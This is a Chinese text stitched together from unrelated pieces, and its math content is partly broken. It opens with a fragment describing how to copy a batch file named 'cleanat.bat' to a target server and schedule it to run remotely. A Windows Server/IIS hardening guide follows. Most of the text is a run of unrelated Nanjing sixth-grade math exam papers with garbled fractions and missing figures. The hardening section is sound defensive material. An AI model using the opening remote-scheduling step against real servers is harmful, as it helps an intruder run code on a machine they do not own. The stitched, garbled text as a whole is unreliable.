将cleanat.bat复制到目标服务器的C:\查看对方电脑当前时间设置目标主机11:13运行cleanat.bat查看任务是否执行
3.共享权限的修改
在系统默认情况下,每建立一个新的共享,Everyone用户就享有“完全控制”的共享权限,因此,在建立新的共享后应该立即修改Everyone的缺省权限,不能让Web服务器访问者得到不必要的权限,给服务器带来被攻击的危险。
4.为系统管理员账号更名
对于一般用户,我们可以在“本地安全策略”中的“帐户锁定策略”中限制猜测口令的次数,但对系统管理员账号(adminstrator)却无法限制,这就可能给非法用户攻击管理员账号口令带来机会,所以我们需要将管理员账号更名。具体设置方法如下:
鼠标右击“我的电脑”|“管理”,启动“计算机管理”程序,在“本地用户和组”中,鼠标右击“管理员账号(administrator)”|“重命名”,将管理员账号修改为一个很普通的用户名。
5.禁用TCP/IP 上的NetBIOS
NetBIOS是许多安全缺陷的源泉,所以我们需要禁用它。
鼠标右击桌面上“网络邻居” |“属性”|“本地连接”|“属
性”,打开“本地连接属性”对话框。选择“Internet协议
(TCP/IP)”|“属性”|“高级”|“WINS”,选中下侧的“禁
用TCP/IP上的NetBIOS”一项即可解除TCP/IP上的NetBIOS,
如图7-8-1所示。
6.TCP/IP上对进站连接进行控制
(1)利用TCP/IP筛选
鼠标右击桌面上“网络邻居”|“属性”|“本地连接”
|“属性”,打开“本地连接属性”对话框。选择“Internet
协议(TCP/IP)” |“属性”|“高级”|“选项”, 在列表中
单击选中“TCP/IP筛选”选项。单击“属性”按钮,选择
“只允许”,再单击“添加”按钮,如图7-8-2所示,只填入
80端口。图7-8-2 利用TCP/IP筛选对进站进行控制
(2)利用IP安全策略
IPSec Policy Filters(IP安全策略过滤器)弥补了传统TCP/IP设计上的“随意信任”重大安全漏洞,可以实现更仔细、更精确的TCP/IP
安全。它是一个基于通讯分析的策略,将通讯内容与设定好的规则进行比较以
图7-8-1 禁用TCP/IP 上的
NetBIOS
判断通讯是否与预期相吻合,然后据此允许或拒绝通讯的传输。我们同样可以设置只允许80端口的数据通过,其它端口来的数据一律拦截。
图7-8-3 利用IP安全策略对进站数据进行过滤
7.防范拒绝服务攻击
DDoS攻击现在很流行,例如SYN使用巨量畸形TCP信息包向服务器发出请求,最终导致服务器不能正常工作。改写注册表信息虽然不能完全制止这类攻击,但是可以降低其风险。打开注册表:将HKLM\System\CurrentControlSet\Services\Tcpip\Parameters下的SynAttackProtect的值修改为2。这样可以使TCP/IP调整SYN-ACKS的重传,当出现SYN-ATTACK迹象时,使连接对超时的响应更快。
7.8.2 保证IIS自身的安全性
1.IIS安全安装
在保证系统具有较高安全性的情况下,还要保证IIS的安全性。要构建一个安全的IIS服务器,必须从安装时就充分考虑安全问题。
(1)不要将IIS安装在系统分区上
默认情况下,IIS与操作系统安装在同一个分区中,这是一个潜在的安全隐患。因为一旦入侵者绕过了IIS的安全机制,就有可能入侵到系统分区。如果管理员对系统文件夹、文件的权限设置不是非常合理,入侵者就有可能篡改、删除系统的重要文件。或者利用一些其他的方式获得权限的进一步提升。将IIS安装到其他分区,即使入侵者能绕过IIS的安全机制,也很难访问到系统分区。
(2)修改IIS的安装默认路径
IIS的默认安装的路径是\inetpub,Web服务的页面路径是\inetpub\wwwroot,这是任何一个熟悉IIS的人都知道的,入侵者也不例外,使用默认的安装路径无疑是告诉了入侵者系统的重要资料,所以需要更改。
(3)打上Windows和IIS的补丁
只要提高安全意识,经常注意系统和IIS的设置情况,并打上最新的补丁,IIS就会是一个比较安全的服务器平台,能为我们提供安全稳定的服务。
2.IIS的安全配置
(1)删除不必要的虚拟目录
IIS安装完成后在wwwroot下默认生成了一些目录,并默认设置了几个虚拟目录,包括IISHelp、IISAdmin、IISSamples、MSADC等,它们的实际位置有的是在系统安装目录下,有的是在重要的Program files下,从安全的角度来看很不安全,而且这些设置实际也没有太大的作用,所以我们可以删除这些不必要的虚拟目录。
(2)删除危险的IIS组件
默认安装后的有些IIS组件可能会造成安全威胁,应该从系统中去掉,所谓“多一个组件,不如少一个组件”。以下是一些“黑名单”,用户可以根据自己的需要决定是否删除。
● Internet服务管理器(HTML):这是基于Web 的IIS服务器管理页面,一般情况下不应通过Web进行管理,建议卸载它。
● SMTP Service和NNTP Service:如果不打算使用服务器转发邮件和提供新闻组服务,就可以删除这两项,否则,可能因为它们的漏洞带来新的不安全。
● 样本页面和脚本:这些样本中有些是专门为显示IIS的强大功能设计的,但同样可被用来从Internet上执行应用程序和浏览服务器,建议删除。或者在安装时就选择不安装这些不必要的组件。
(3)为IIS中的文件分类设置权限
除了在操作系统里为IIS的文件设置必要的权限外,还要
在IIS管理器中为它们设置权限,以期做到双保险。一般而言,
对一个文件夹永远也不应同时设置写和执行权限,以防止攻击
者向站点上传并执行恶意代码。另外目录浏览功能也应禁止,
预防攻击者遍览站点上的文件夹。一个好的设置策略是:为Web
站点上不同类型的文件都建立目录,然后给它们分配适当权
限。例如:
● 静态文件文件夹:包括所有静态文件,如HTM 或HTML,
给予允许读、拒绝写的权限
● ASP脚本文件夹:包含站点的所有脚本文件,如cgi、
vbs、asp等等,给予允许执行、拒绝写的权限,如图7-8-4所
示。
● EXE等可执行程序:包含站点上的二进制执行文件,给
予允许执行、拒绝写和拒绝读的权限。(4)删除不必要的应用程序映射
ISS中默认存在很多种应用程序映射,如.htw、.ida、.idq、.asp、.cer、.cdx、.asa、.htr、.idc、.shtm、.shtml、.stm、.printer等,通过这些程序映射,ISS就能知道对于什么样的文件该调用什么样的动态链接库文件来进行解析处理。但是,在这些程序映射中,除了.asp,.shtm,.shtml,.stm 4种格式文件以外,其它的文件在网站上都很少用到。而且在这些程序映射中,.htr、.idq/ida、.printer等多个程序映射都已经被发现存在缓存溢出问题,入侵者可以利用这些程序映射
中存在的缓存溢出获得系统的权限。其它尚未发现漏
洞的程序映射,也并不能说就是安全的。
所以我们需要将这些不需要的程序映射删除。在
“Internet服务管理器”中,右击网站目录,选择“属
性”,在网站目录属性对话框的“主目录”页面中,点
击“配置”按钮,弹出“应用程序配置”对话框,在
“应用程序映射”页面,删除无用的程序映射,如图7-
8-5所示。
如果确实需要某一类文件时,必须安装最新的系
统修补程序以解决程序映射存在的问题,并且选中相
应的程序映射,再点击“编辑”按钮,在“添加/编辑
应用程序扩展名映射”对话框中勾选“检查文件是否
存在”选项,如图7-8-6所示。这样当客户请求这类文
件时,IIS会先检查该文件是否存在,文件存在后才会
去调用程序映射中定义的动态链接库来解析
。
图7-8-4
为浏览者设置有限的权限
图7-8-5 只保留有用的程序映射
苏教版六年级数学下册 江苏南京市
2018年小学六年级毕业测试数学试卷 一、仔细推敲,准确判断。(正确的涂“A ”,错误的涂“B ”。每题1分,共10分) 1.如果小刚站在小明北偏东45°方向处,那么小明就站在小刚西偏南45°的方向处。( ) 2.游泳池平均水深1.2米,小强身高1.6米,因此即使他不会游泳,掉入池中也一定不会有危险。( ) 3.一条4米长的绳子增加它的 41后,再减少4 1 ,结果还是4米。( ) 4.李师傅做100个零件,合格率是95%,他再做2个合格零件,这时他做的零件的合格率就是97%。( ) 5.所有的奇数都是质数,所有的偶数都是合数。( ) 6.通过放大10倍的放大镜看一个10°的角,这个角是100°。( ) 7.医生要记录一位发烧病人体温变化情况,选择折线统计图表示最合适。( ) 8. 1512、161、125 1 都能化成有限小数。( ) 9.棱长是4cm 的正方体木块可以加工4个棱长是1cm 的小正方体。( ) 10.一个闹钟8点整敲8下需要7秒,那么8点整敲9下就需要8秒。( ) 二、反复比较,慎重选择。(将正确答案涂在答题卡上,每题1分,共15分) 11.下列图形中,( )的对称轴最多。 A.长方形 B.正方形 C.等边三角形 D.等腰梯形 12.某足球评论员预测世界杯德国队有80%的机会战胜意大利队。与划线部分最接近的意思是( )。 A.德国队肯定会赢这场比赛; B.德国队肯定会输这场比赛; C.假如这两支球队进行10场比赛,德国队会赢8场左右; D.假如这两支球队进行10场比赛,德国队恰好会赢8场。 13.在一幅比例尺是( )的地图上,量得上海到杭州的距离是3.4cm 。上海
江苏省南京市六年级上学期数学期末试卷
江苏省南京市六年级上学期数学期末试卷 姓名:________ 班级:________ 成绩:________ 亲爱的同学,经过一段时间的学习,你们一定学到不少知识,今天就让我们大显身手吧! 一、细心填空.(共15分) (共8题;共15分) 1. (2分) 27千米的倍是________千米。 2. (2分)(2018·浙江模拟) 3. (2分)每袋可以装0.65千克糖,18千克糖可以装满________袋?还剩下糖________千克? 4. (2分)利用“三角形内角和等于180°,试着计算出下面两个图形的内角和各是多少度. 5. (3分) (2019六上·龙华) 圆的直径是6分米,它的周长是________分米,它的面积是________平方分米。 6. (1分)一个正方形花坛周长是6米,这个花坛的面积是________平方米 7. (1分)已知一个比的后项与比值互为倒数,则前项是________. 8. (2分)新华小学六年级计划到山上植树50棵,实际植树65棵,实际比计划增加了________ %。 二、火眼金睛,准确判断.(共5分) (共5题;共6分) 9. (2分)圆是轴对称图形,有无数条对称轴。()。 10. (1分)判断对错. 把1克糖溶于100克水中,糖和糖水的比是1∶100.
11. (1分)一本书有100页,小明已经读了45%,还剩55%没读。 12. (1分) (2019五下·濮阳期末) 直径是7厘米的圆比半径是4厘米的圆的圆周率大.() 13. (1分) (2019六上·灵宝期中) a是自然数,a的倒数是。() 三、精挑细选,认真选择.(12分) (共12题;共12分) 14. (1分)车轮滚动一周,所行的路程是求车轮的() A . 周长 B . 半径 C . 直径 15. (1分)如图,大圆内画一个最大的正方形,正方形内画一个最大的圆…,如此画下去,共画了4个圆.那么,最大的圆的面积是最小的圆的()倍. A . 2 B . 4 C . 8 D . 16 16. (1分)下面几句话中错误的是() A . 计算除法时,要从被除数最高位除起,每次除得的余数必须比除数小 B . 计算正方形面积时,可把正方形看成长、宽都相等的长方形,利用长方形面积的计算公式 C . 一年有4个季度,每个季度都有3个月,每个季度都是90天
南京市六年级上学期数学期末试卷(练习)
南京市六年级上学期数学期末试卷 姓名:________ 班级:________ 成绩:________ 小朋友,带上你一段时间的学习成果,一起来做个自我检测吧,相信你一定是最棒的! 一、填空(共27分) (共13题;共26分) 1. (2分)在横线上填上“>”、“<”或“=” 0.67________67% 31.3________313% 260%________2.6 ________100% 1%________0.1 0.25________25% 50%________ 0.3________0.3% 2. (2分)一瓶牛奶,小明第一次喝了,然后往瓶里装满水,又接着喝去,小明第________次喝的纯牛奶多。 3. (2分)(2019·诸暨模拟) 把六(1)班人数的调到六(2)班,则两班人数相等,原来六(1)班人数与六(2)班人数的比是________。 4. (2分)花生仁的出油率为41%,用1200千克花生仁可榨出油________千克.如果要榨出花生油8200千克,需要花生仁________千克. 5. (2分) (2020六上·达川期末) 街心花园里的圆形花坛,周长12.56m,花坛占地面积是________m2。 6. (2分)填上“>”“<”或“=”。 3.5÷2.1________3.59.2÷0.15________9.2÷1.5 5.4÷0.99________5.4 4.8÷0.8________4.8×0.80.808080…________ 2.14÷1.5________2.14×1.5 2.717171…________ 3.25÷0.01________3.25×100 7. (3分)(2018·浙江模拟) 在横线里填上“>”“<”或“=”。 ________1.67 ________ ________ ________ 8. (2分)一件工作,甲每天做8小时30天能完成,乙每天做10小时22天就能完成.甲每做6天要休息一天,乙每做5天要休息一天,现两队合做,每天都做8小时,做了13天(包括休息日在内)后,由甲独做,每天做6小时,那么完成这项工作共用了________ 天. 9. (2分) (2020六上·龙华期末) 在一个边长是8厘米的正方形内画一个最大的圆,这个圆的周长是________厘米,面积是________平方厘米。 10. (2分)你能发现什么规律?在横线里填上合适的数.
南京市六年级数学测试
六年级数学寒假作业(七) 成功=艰苦劳动+正确方法+少说空话 一、填空。 1、在括号里填上合适的数。 2.6立方米=( )立方分米 2公顷50平方米=( )公顷 40分=( )时 4600毫升=( )立方分米 2、天平一端放着一大块巧克力,另一端放着2 3 块巧同样的克力和50克的一个砝码,这时天 平恰好平衡。一块大巧克力的重量是( )克。 3、6÷( )= ( ) 6 =( ): 40=75% 4、甲数比乙数多1 6 ,乙数与甲数的比是( ),甲数占两数和的( )( ) 。 5、两块一样重的合金,一块合金铜和锌的比是2:5,另一块合金中铜和锌的比是1:3。现 在将两块合金合成一块,新合金中铜和锌的比是( : )。 6、甲数是乙数的78 ,丙数是甲数的2 5 ,乙数是丙数的( )。 7、一张周长是12分米的正方形纸,剪成一个最大的圆形, 那么圆的周长是( )分米,这张纸的利用率是( )%。 8、如图,AD =3BD ,BF =14 BC ,AE =1 4 EC ,则 三角形DEF 的面积是三角形ABC 面积的( ) ( ) 。 9、有一杯盐水,盐与水的重量比是1:10,再放入2克盐,这时盐水共重46克,原来盐水中有盐( )克,水( )克。 10、欧美常用华氏度(°F )为单位描述温度。华氏度的冰点是32°,沸点是212°,而在我国采用摄氏度(°C)为单位描述温度,摄氏度的冰点是0°,沸点是100°,人体正常的温度是37摄氏度,应是华氏( )度。 二、判断题。 11、体积相等的两个正方体,表面积不一定相等。………………………………………( ) 12、一个长方形的长增加15 ,要使它的面积不变,宽应该减少1 5 。……………( ) 13、一根铁丝分成两段,第一段长25 米,第二段占全长的2 5 ,那么两段一样长。( ) 14、甲数除乙数的商是2.5,甲、乙两数的比是2:5。…………………………( ) 15、“买十送一”比“九折优惠”便宜。………………………………………… ( )
2020年南京市小学六年级数学上期末模拟试卷及答案
2020年南京市小学六年级数学上期末模拟试卷及答案 一、选择题 1.某校男、女生比例如右图,则男生占全校人数的( )。 A. 48% B. 52% C. 78% 2.一件毛衣降价5元后,按45元售出,降价了()。 A. 9% B. 11.1% C. 10% 3.给7.5后面添上百分号,这个数将( )。 A. 扩大100倍 B. 缩小100倍 C. 大小不变 4.用一块长12米、宽8米的长方形铁皮剪成半径是2米的小圆(不能剪拼),至多能剪()个。 A. 7 B. 8 C. 6 D. 13 5.在5:3中,如果前项加上15,要使比值不变,后项应() A. 加15 B. 加9 C. 乘15 D. 乘9 6. (1)以超市为观察点,商场在()。 A.正南方 B.正西方 C.正东方 (2)以超市为观察点,学校在()方向上。 A.东偏南30° B.南偏东30° C.西偏北30° 7.一件衣服,上衣120元,裤子比上衣的价格少,裤子的价格是多少?列式为() A. 120×(1- ) B. 120÷ C. 120÷(1+ ) 8.下图中,正方形的面积是16平方厘米,圆的面积是()cm2。
A. 50.24 B. 47.1 C. 43.98 D. 37.68 9.吃了一包糖的后,剩下的是吃了的()。 A. B. C. 3倍 D. 2倍 二、填空题 10.上周三,六(2)班到校上课的有38人,缺席2人,那么这一天的出勤率是________。 11.如图,半圆的面积是39.25cm2,圆的面积是28.26cm2,那么阴影部分的面积是________cm2。 12.下面是某学校教师喜欢看的节目统计图。 (1)喜欢《走近科学》的老师占全体老师人数的________%。 (2)喜欢________节目和________节目的人数差不多。 (3)喜欢________节目的人数最少。如果该学校有150名老师,那么喜欢新闻联播的老师有________人。 13.一个三角形三个内角的度数比是2:5:3,这个三角形是________三角形。 14.以猴山为参照点,说一说其他动物场馆的具体位置
2020-2021南京市南京市雨花台中学小学六年级数学上期末一模试卷附答案
2020-2021南京市南京市雨花台中学小学六年级数学上期末一模试卷附答案 一、选择题 1.在一个圆形花坛内种了三种花(如图所示),用下面条形统计图()熊更准确地表示各种花的占地面积。 A. B. C. 2.某商店同时卖出两件商品,卖价均为120元,其中一件盈利20%,另一件亏本20%,这个商店卖出这两件商品,相对成本而言,总体上()。 A. 不亏不赚 B. 赚了10元 C. 亏了10元 D. 亏了20元 3.六(1)班今天出勤的人数是47人,有3人请病假,出勤率是()。 A. 6% B. 93.6% C. 94% 4.圆是轴对称图形,它有()条对称轴。 A. 一 B. 两 C. 无数 D. 四5.关于圆,下列说法错误的是(). A. 圆有无数条半径 B. 圆有无数条对称轴 C. 半径越大,周长越大 D. 面积越大,周长越小 6.小红、小刚、小华三个人收集郎票,小红和小刚收集的邮票数之比是2:3,小刚和小华收集的邮票数之比是6:13,三人共收集230枚,则小红收集的邮票比小华少()枚. A. 80 B. 90 C. 100 D. 110 7.一台榨油机小时榨油吨,平均每小时榨油多少吨?列式正确的是()。 A. B. C. 8.如图,A、B、C三个小岛的位置正好构成了一个直角三角形.那么A岛的位置在B岛的()
A. 东偏北30°的方向,距离4千米 B. 北偏东60°的方向,距离4千米 C. 西偏南30°的方向,距离4千米 D. 西偏南60°的方向,距离4千米 9.食堂新买来一瓶洗洁精,第一周用了,第二周又用了余下的,那么() A. 第一周用得多 B. 第二周用得多 C. 一样多 二、填空题 10.观察鸡蛋各部分统计图,鸡蛋中蛋黄占________;蛋白占________;蛋壳占________。 11.一块蔬菜地,种着青椒、黄瓜、丝瓜和茄子四种蔬菜(如图)。丝瓜种植面积是150m2,茄子的种植面积是________m2。 12.一个半圆的周长是25.7 cm,这个半圆的面积是________cm2. 13.某班学生人数在50人到60人之间,男、女生人数的比是5:6,这个班全班有________人,女生________人. 14.看图,王明家在学校的南偏东________°,距离________米处。 15.一辆汽车分钟行驶千米,照这样计算,每分钟行驶________千米. 16.一袋大米30千克,已经吃了,吃了________千克,还剩下全部的________.
江苏省南京市六年级上册数学期末卷
江苏省南京市六年级上册数学期末卷 姓名:________ 班级:________ 成绩:________ 亲爱的小朋友们,这一段时间的学习,你们收获怎么样呢?今天就让我们来检验一下吧! 一、思考填写。(共22分) (共12题;共22分) 1. (3分) (2020六上·兴化期末) ________%=4÷________= =________:10=________(填小数)。 2. (2分)圆的半径扩大2倍,直径就扩大________倍,周长就扩大________倍,面积就扩大________倍。 3. (2分)把化成最简单的整数比是________,比值是________. 4. (1分)妈妈今年40岁,小明年龄是妈妈的,又是外婆年龄的,外婆今年(________ )岁。 5. (2分)在一个面积是24平方厘米的正方形内画一个最大的圆,这个圆的面积是________平方厘米;再在这个圆内画一个最大的正方形,正方形的面积是________平方厘米。 6. (2分)一班人数是二班人数的110%,一班人数比二班人数多百分之________? 7. (2分) (2018六上·未央期末) 王大爷去年在山坡上种植50棵树,结果有4颗树没有活,成活率是________%。 8. (2分)一种黄铜,由锌和铜按3∶7熔铸而成,要生产这种黄铜280千克,需要铜________千克,锌________千克.现有铜280千克,在熔铸时应加锌________千克. 9. (2分)书店的所有图书按标价的7.5折出售,这个7.5折指的是________占________的________% 10. (1分)一个直角三角形的两条直角边共长是14厘米,它们的长度之比是3∶4。如果斜边长10厘米,那么斜边上的高是________厘米。 11. (2分)(2012·广州) 为绿化城市,某街道栽种一批树苗,这批树苗的成活率是75%~80%,如果要栽活2400棵树苗,至少要栽种________棵。 12. (1分)甲、乙两套运动装,成本共150元,甲套装按30%的利润定价,乙套装按20%的利润定价.为了
南京小学期末考试真题
南京市小学苏教版六年级下册小学数学期末测试题 一、填空:(共15分) 1、30平方米比24平方米多( )% ; 比8千克多0.4千克是( )千克; 140千克比( )千克多40%; 5千克减少20%后是( )千克。 2、一个圆锥的体积是48立方厘米,底面积是16平方厘米,高是( )厘米。 3、某种盐水的含盐率是8 ℅,也就是在( )克水中放入8克盐。 4、把54、32、48、81四个数组成一个比例式( )。 5、大圆的半径是5厘米,小圆的半径是2厘米,大圆与小圆的周长之比为( ),小圆与大圆的面积之比为( )。 6、把4∶15的前项加上2.4,为了要使所得的比值不变,比的后项应加上( )。 7、甲数的58 等于乙数的1 2 ,甲数∶乙数=( )∶( )。 8、x=5b -2b ,b 和x 成( )比例。 9、一根长3米的圆柱形木料,平均截成4段后,表面积增加了12平方分米,原来这根木料的体积是( )立方分米。 10、有一块长24厘米、宽18厘米的长方形硬纸板,小明横着卷成一个圆柱,得到圆柱的体积是( )立方厘米,小华竖着也卷成一个圆柱,得到圆柱的体积是( )立方厘米。(圆周率取3进行计算) 二、判断(共5分) 1、长方体、正方体、圆柱和圆锥的体积都可以用“底面积×高”计算。 ( ) 2、 在左图中,圆柱和圆锥的体积相等。 ( ) 3、在一个比例中,两个外项交换位置后仍是比例。 ( ) 4、一幅平面图的比例尺为10:1,它表示实际距离是图上距离的10倍。 ( )
5、当ab=xy(a 、b 、x 、y 都不为0时),a x 与b y 可以组成比例。 ( ) 三、选择(共5分) 1、甲、乙两数的比是4∶5,甲数比乙数( ) A 、大15 B 、大14 C 、小15 D 、小1 4 2、把一个底面直径是2分米、高是3分米的圆柱形容器中注满水,现垂直轻轻插入一根底面积是0.6平方分米,高是4分米的方钢,溢出水的体积是( )毫升。 A 、2.4 B 、1.8 C 、2400 D 、1800 3、一张图纸长30厘米,王技术员打算把一个实际长度是2.1毫米的零件画到这张图纸上,可选用适当的比例尺是( )。 A 、 150 : 1 B 、1:150 C 、100:1 D 、1:100 4、某班男生人数是女生人数的11 7 倍,那么男生与全班人数的比为( )。 A 、8:7 B 、7:8 C 、815 D 、15 8 5、一个圆柱和一个圆锥的底面积相等,圆柱的体积是圆锥体积的2倍,圆柱的高是圆锥高的( )。 A 、 12 B 、 13 C 、 23 D 、 1 4 四、计算(共31分) 1、直接写出得数。(4分) 0.49÷0.7= 0.77+0.33= 0÷2 3 = 3.06-2.6 = 815 ×200= 14 ÷8= 0.21×1 3 = 0.52= 2、解方程或解比例(9分) 5.4X +2.6X=840 8X -31=9 1 78 : X =2.1: 815 3、怎样简便怎样算(18分) 20.2×8-10.2÷0.125 4×27%×2.5 1425 ÷( 75 + 14 25 )
2016-2017 学年第一学期江苏省南京市鼓楼区期末统考六年级数学试卷答案
2016-2017学年度鼓楼区第一学期六年级 数学学科学业水平测试卷 2017.1 总分:100分 时间:80分钟 第一部分:概念理解(37%) 一、认真思考、正确填写。(31%) 1.( )÷5=0. 6=15 ( ) =( ):40=( )% 2.填上合适的单位。 (1)一个仓库占地400( ) (2)一个集装箱的容积约是40( ) 3.160毫升=( )升 3 4 平方米=( )平方分米 4.在括号里填适当的数。 1119( )?= 5577( )?< 44 55 ( )÷> 5.在右图长方体中:(单位:厘米) ①它的左侧面的周长是( )cm 。 ②最大面的面积是( )cm 2,这个长方体的体积是( )cm 3。 ③如果用铁丝做成这样一个长方体框架,至少需要铁丝( )cm 。 6.23 :34的比值是( ),化简成最简整数比是( )。 7.先找规律,再填数:3416 ,1,,,(),()439 。 8.王朋把5000元钱存入银行,定期三年,年利率是3. 40%,到期后赢得利息( )元。 9.孙阿姨每小时织布3 5,照这样计算23小时可织布( )米;织12米布要( )小时。 10.一根20米长的绳子,用去45,还剩( )米;如果再用去4 5 米,这时候还剩( )米。 11.六(1)班男生25人,女生23人,男生的人数比女生多( )%。 12.一个长4厘米,宽2厘米的长方形。这个长方形的长和宽分别增加1 2 后,现在长方形的面积是原来的() () 。 1.2
13.右图是用1立方厘米的小方块在桌面上搭起来的,它与桌面接触的面积是( )平方厘米;它一共有( )个这样的小方块;继续摆,至少增加( )个相同的小方块才能拼成一个较大的正方体。 14.六(1)班书法组人数是合唱组的 45,合唱组的人数是舞蹈组的56 ,书法组,合唱组和舞蹈组的三个小组人数比是( )。 15.甲有图书130本,乙有图书70本,乙给甲( )本后,甲与乙的图书本数之比是4:1。 二、反复推敲、慎重选择。(6%) 1.南京钢铁厂去年实际超产10%,是把( )看做单位“1”。 A. 实际产量 B. 计划产量 C. 超过的产量 D. 无法确定 2.一杯糖水,糖与水的比是1:16,喝掉一半后,糖与水的比是( ) A. 1:4 B. 1:8 C. 1:16 D. 1:32 3.林场去年种植了10000棵树苗,年底抽查棵其中的1000棵,死亡率是2%。你预计一下,林场种植的这批树苗的成活率是( )。 A. 20% B. 80% C. 98% D. 2% 4.下面的图形中,能按照虚线折成正方体的是( )。 A. B. C. D. 5.两根同样长的铁丝,从第一根上截去它的34,从第二根上截去3 4 米。余下部分( )。 A. 第一根长 B. 第二根长 C. 一样长 D. 无法比较 6.在一本科学幻象书上,玛格内行星的人们使用migs 、mags 及mogs 为钱币。已知1mags =8migs ,1mogs =6mags 。请问10mogs +6mags =( )migs 。 A. 108 B. 240 C. 480 D. 528
江苏省南京市六年级 上学期数学期末考试试卷
江苏省南京市六年级上学期数学期末考试试卷 姓名:________ 班级:________ 成绩:________ 亲爱的小朋友们,这一段时间的学习,你们收获怎么样呢?今天就让我们来检验一下吧! 一、填空。 (共12题;共25分) 1. (1分) (2018六上·张家川期末) 一个圆环的外直径是10cm,内直径是8cm,这个圆环的面积是________平方厘米。 2. (4分)在横线上填上“>”“<”或“=”。 4600平方分米 ________46平方米 3平方米________30平方分米 1吨750千克________2050千克 50千克________5000克 3. (2分)甲,乙,丙三个数的平均数是1.6,甲,乙的比是4:3,乙,丙的比是1:3,这三个数中最大的是________,最小的是________ 4. (1分)一块绿地长150米,宽是长的,这块绿地的面积是________ 5. (1分)(2018·浙江模拟) 把8克糖溶解在42克开水中,这种糖水的含糖率是________ 6. (2分) (2020六上·汉中期末) 用圆规画一个周长是18.84厘米的圆,圆规两脚尖叉开的距离是________厘米,所画圆的面积是________平方厘米。 7. (2分)先找出规律,再按照规律填表。 14 12 10 8 ________ ________ 8. (2分) (2020六上·唐县期末) 有2吨货物,甲车每次运这堆货物的,乙车每次运吨。若单独运完这些货物,甲车需运________次,乙车需运________次。 9. (1分)填空
________(从上到下依次填写) 10. (4分)(2020·迁安) 1.5:________= =75÷________=________%=________(填小数) 11. (2分)等腰三角形的其中两个角的比2:5,则其顶角可能是________ 或________ . 12. (3分)“小明第一周花费了本月生活费的,第二周花费了余下钱数的”,若把本月生活费看作 单位“1”,则第一周过后还剩下________,第二周花费的就是它的,第二周花费了全部的________,由此看来前两周的花费________ 二、判断对错,对的打“√”,错的打“×”。 (共6题;共12分) 13. (2分)为了清楚地展示两种自行车销量在全年的变化趋势,选择条形统计图. 14. (2分)一吨黄沙用去,又运来吨,这堆黄沙的质量没有变。 15. (2分)判断对错. 一个非零整数的倒数,一定是真分数. 16. (2分) (2020六上·官渡期末) 面积相等的两个圆,周长也一定相等。() 17. (2分) (2020三上·汕头期末) 、、、这四个分数中,最大,最小。() 18. (2分)一根绳子长 0.9米,可以写成90%米. 三、选择题:把正确答案的序号填在括号里。 (共6题;共13分) 19. (2分)一个比的前项扩大为原来的3倍,后项缩小为原来的,这个比的比值()。 A . 不变 B . 扩大为原来的9倍
2020-2021南京市小学六年级数学上期末一模试卷(及答案)
2020-2021南京市小学六年级数学上期末一模试卷(及答案) 一、选择题 1.鸡、鸭、鹅的只数比是3:2:1,画成扇形统计图后,表示鸡的只数的扇形圆心角的度数是( )。 A. 180o B. 90o C. 60o D. 30o 2.六(1)班今天出勤的人数是47人,有3人请病假,出勤率是()。 A. 6% B. 93.6% C. 94% 3.1时的45%是( )分。 A. 4.5 B. 45 C. 0.45 D. 27 4.下面图案中,对称轴条数最多的是()。 A. B. C. D. 5.已知一个圆的半径是R,且R满足3:R=R:4,则这个圆的面积为() A. 7π B. 7 C. 12π D. 无法求出 6.修一条路,已经修了全长的,剩下的与已修的比是()。 A. 3:4 B. 4:3 C. 4:7 D. 3:7 7.合唱队女生人数原来占,后来有6名女生加入,这样女生人数就占总人数的。现在合唱队有女生()人。 A. 10 B. 16 C. 20 D. 36 8.以广场为观测点,学校在北偏东30°的方向,下图中正确的是() A. B. C. 9.把 + + + + 改写成乘法算式,下面改写错误的是() A. ×3 B. ×5 C. ×6 二、填空题 10.水果店运来25千克苹果,比杏子多5千克,苹果比杏子多________%。
11.把一个圆柱平均分成3段,变成了3个完全相等的圆柱,这时表面积比原来增加了50.24平方厘米,这个圆柱的底面积是________平方厘米。 12.六年级有50人,每人只能参加一项课外活动,课外活动情况如下图所示。 (1)喜欢打________的人数最多,是________人。 (2)喜欢打________的人数最少,是________人。 (3)喜欢打篮球的有10人,占全班人数的________%。 13.一辆收割机3 小时收割5 公顷小麦,那么,1小时收割________公顷,收割1公顷需要________小时。 14.如图,________在学校西偏北30°方向200m处. 15.赵大娘家养的母鸡比公鸡多80只,已知公鸡和母鸡只数的比是1:5,赵大娘家公鸡有________只,母鸡有________只。 16.有一堆2吨的煤,第一次先用去吨,此时还剩________吨;第二次用去剩下的,第二次用去________吨,此时剩下________吨煤。 三、解答题
2020-2021南京市小学六年级数学上期末试题附答案
2020-2021南京市小学六年级数学上期末试题附答案 一、选择题 1.下面说法中,正确的说法是() A. 一个不为0的数除以一个假分数,商一定大于被除数 B. 一个数的倒数一定比这个数小 C. 扇形统计图主要用来表示某个量随时间变化而发生的增减变化情况 D. 在同一个圆中,一个扇形的圆心角的度数越大,它的面积就越大 2.在含盐30%的盐水中,加入6g盐和14g水,这时盐水含盐的百分比()。 A. 等于30% B. 小于30% C. 大于30% D. 无法计算3.1时的45%是( )分。 A. 4.5 B. 45 C. 0.45 D. 27 4.一个圆的周长扩大3倍,它的面积就扩大()倍. A. 3 B. 6 C. 9 5.把7:5的前项增加35,要使比值不变,后项应()。 A. 乘5 B. 乘6 C. 增加30 D. 增加35 6.同样高的杆子,离路灯越远,它的影子() A. 越短 B. 越长 C. 不变 7.儿童的负重最好不要超过体重的,下面()同学的书包超重了。 A. B. C. 8.一个圆的半径为r,直径为d,这个半圆的周长是()。 A. 2πr+d B. πd+d C. (πd+d)÷2 D. r(π+2)9.一袋白菜,吃了刚好是 21千克。这袋白菜原来有()千克。 A. 30 B. 49 C. 二、填空题 10.小丽家上月的教育支出是全月总支出的25%,绘制她家上月支出情况的扇形统计图
时,圆的面积表示________。若爱心捐款支出是总支出的12.5%,则教育支出是爱心捐款支出的________倍。 11.________米比20米多米,12千克比16千克少________%. 12.下图中,A点在O点的________偏________(________)°方向上,B点在A点的________偏________(________)°方向上。 13.30千克奶糖,卖出它的后又卖出千克。共卖出________千克。 14.一个正方形的边长和一个圆的半径相等,已知正方形的面积是20平方分米,圆的面积是________平方分米。 15.________÷30=6:15= ________ 16.60千米的是________千米。________的是10. 三、解答题 17.根据下图解决问题: (1)已知不及格的有2人,全班有多少人? (2)成绩良好的同学比成绩优秀的同学多百分之几? 18.某服装店老板为了提高销售额,现将所有商品提价30%,而后宣传说:“为了回收资金,所有商品打八折,数量有限,预购从速”。请你算一算,一件没有提价前标价360元的服装,现在售价多少元? 19.一个圆形养鱼池,它的周长是31.4米,它的占地面积是多少平方米? 